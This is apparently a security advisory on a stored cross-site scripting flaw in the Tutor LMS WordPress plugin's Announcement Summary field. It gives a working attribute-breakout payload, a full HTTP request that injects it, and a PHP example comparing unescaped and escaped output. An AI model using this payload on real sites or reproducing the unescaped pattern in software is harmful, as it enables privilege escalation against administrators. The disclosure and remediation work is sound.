The plugin did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This led to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.
As a Tutor Instructor, create an Announcement and put the following payload in the Summary field:

    " style="animation-name:rotation" onanimationstart="alert(/XSS/)//

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Accept: */*
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 341
    Connection: close
    Cookie: [Tutor Instructor+]

    _tutor_nonce=52e764441f&tutor_announcement_course=973&tutor_announcement_title=Test+Inst+XSS&tutor_announcement_summary=%22+style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert(%2FXSS%2F)%2F%2F&action=tutor_announcement_create&action_type=create
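The attribute-context flaw described above and its fix, as an added example that is not the plugin's own code. The markup, the `data-summary` attribute and the function names are hypothetical, and `htmlspecialchars()` stands in for WordPress's `esc_attr()` when the file runs outside WordPress.

```php
<?php
// Added example, not Tutor LMS code. The markup and the attribute name
// "data-summary" are hypothetical; the advisory only states that the
// Summary was output inside an attribute without escaping.

// Summary value taken from the proof of concept above.
$summary = '" style="animation-name:rotation" onanimationstart="alert(/XSS/)//';

// Vulnerable pattern: raw value concatenated into a quoted attribute.
function render_unescaped(string $summary): string {
    return '<a class="announcement" data-summary="' . $summary . '">Details</a>';
}

// Hardened pattern: escape for the attribute context at output time.
// esc_attr() is the WordPress function; htmlspecialchars() is the
// stand-in used when WordPress is not loaded.
function render_escaped(string $summary): string {
    $safe = function_exists('esc_attr')
        ? esc_attr($summary)
        : htmlspecialchars($summary, ENT_QUOTES, 'UTF-8');
    return '<a class="announcement" data-summary="' . $safe . '">Details</a>';
}

// Parse the markup with an HTML parser and list the attribute names
// that end up on the <a> element.
function attribute_names(string $html): array {
    $doc = new DOMDocument();
    $doc->loadHTML($html, LIBXML_NOERROR | LIBXML_NOWARNING);
    $names = [];
    foreach ($doc->getElementsByTagName('a')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Compare what the parser sees for each rendering.
echo "unescaped: ", implode(', ', attribute_names(render_unescaped($summary))), "\n";
echo "escaped:   ", implode(', ', attribute_names(render_escaped($summary))), "\n";
```

In the unescaped rendering the double quote closes the attribute early, so the parser reports extra attributes supplied by the Summary value. In the escaped rendering the whole value stays inside the one attribute.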